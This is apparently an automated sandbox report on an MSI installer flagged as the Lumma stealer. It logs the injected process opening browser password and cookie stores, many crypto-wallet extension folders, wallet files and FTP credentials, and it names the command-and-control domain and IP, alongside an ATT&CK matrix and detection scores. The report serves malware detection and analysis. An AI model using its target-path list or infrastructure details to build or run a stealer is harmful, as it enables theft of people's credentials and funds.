              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 1708, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: dxdiag.exe PID: 1708, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire Infrastructure1
              Replication Through Removable Media
              2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              311
              Process Injection
              121
              Masquerading
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Screen Capture
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              11
              Virtualization/Sandbox Evasion
              LSASS Memory221
              Security Software Discovery
              Remote Desktop Protocol1
              Archive Collected Data
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Disable or Modify Tools
              Security Account Manager11
              Virtualization/Sandbox Evasion
              SMB/Windows Admin Shares41
              Data from Local System
              113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
              Process Injection
              NTDS1
              Process Discovery
              Distributed Component Object Model2
              Clipboard Data
              Protocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets11
              Peripheral Device Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information
              Cached Domain Credentials1
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSync24
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              File Deletion
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589838 Sample: msit.msi Startdate: 13/01/2025 Architecture: WINDOWS Score: 100 33 fixxyplanterv.click 2->33 37 Suricata IDS alerts for network traffic 2->37 39 Found malware configuration 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 4 other signatures 2->43 8 msiexec.exe 12 35 2->8         started        12 msiexec.exe 4 2->12         started        signatures3 process4 file5 25 C:\Windows\Installer\MSIAEB.tmp, PE32+ 8->25 dropped 27 C:\Windows\Installer\MSI982.tmp, PE32 8->27 dropped 29 C:\Windows\Installer\MSI839.tmp, PE32 8->29 dropped 31 4 other malicious files 8->31 dropped 53 Drops executables to the windows directory (C:\Windows) and starts them 8->53 14 MSIAEB.tmp 8->14         started        17 msiexec.exe 8->17         started        signatures6 process7 signatures8 55 Multi AV Scanner detection for dropped file 14->55 57 Machine Learning detection for dropped file 14->57 59 Writes to foreign memory regions 14->59 61 2 other signatures 14->61 19 dxdiag.exe 2 14->19         started        23 dxdiag.exe 14->23         started        process9 dnsIp10 35 fixxyplanterv.click 172.67.134.197, 443, 49711, 49717 CLOUDFLARENETUS United States 19->35 45 Query firmware table information (likely to detect VMs) 19->45 47 Found many strings related to Crypto-Wallets (likely being stolen) 19->47 49 Tries to harvest and steal ftp login credentials 19->49 51 2 other signatures 19->51 signatures11

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              msit.msi58%VirustotalBrowse
              msit.msi55%ReversingLabsWin64.Spyware.Lummastealer
              SourceDetectionScannerLabelLink
              C:\Windows\Installer\MSIAEB.tmp100%Joe Sandbox ML
              C:\Windows\Installer\MSI602.tmp0%ReversingLabs
              C:\Windows\Installer\MSI670.tmp0%ReversingLabs
              C:\Windows\Installer\MSI6FE.tmp0%ReversingLabs
              C:\Windows\Installer\MSI79B.tmp0%ReversingLabs
              C:\Windows\Installer\MSI839.tmp0%ReversingLabs
              C:\Windows\Installer\MSI982.tmp0%ReversingLabs
              C:\Windows\Installer\MSIAEB.tmp63%ReversingLabsWin32.Exploit.LummaC
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://fixxyplanterv.click/d0%Avira URL Cloudsafe
              https://fixxyplanterv.click/ce0%Avira URL Cloudsafe
              https://fixxyplanterv.click/apiQ0%Avira URL Cloudsafe
              https://fixxyplanterv.click/alS50%Avira URL Cloudsafe
              https://fixxyplanterv.click/ob:6_0%Avira URL Cloudsafe
              https://fixxyplanterv.click/api0%Avira URL Cloudsafe
              fixxyplanterv.click0%Avira URL Cloudsafe
              https://fixxyplanterv.click/0%Avira URL Cloudsafe
              https://fixxyplanterv.click/pi0%Avira URL Cloudsafe
              https://fixxyplanterv.click/apiuu0%Avira URL Cloudsafe
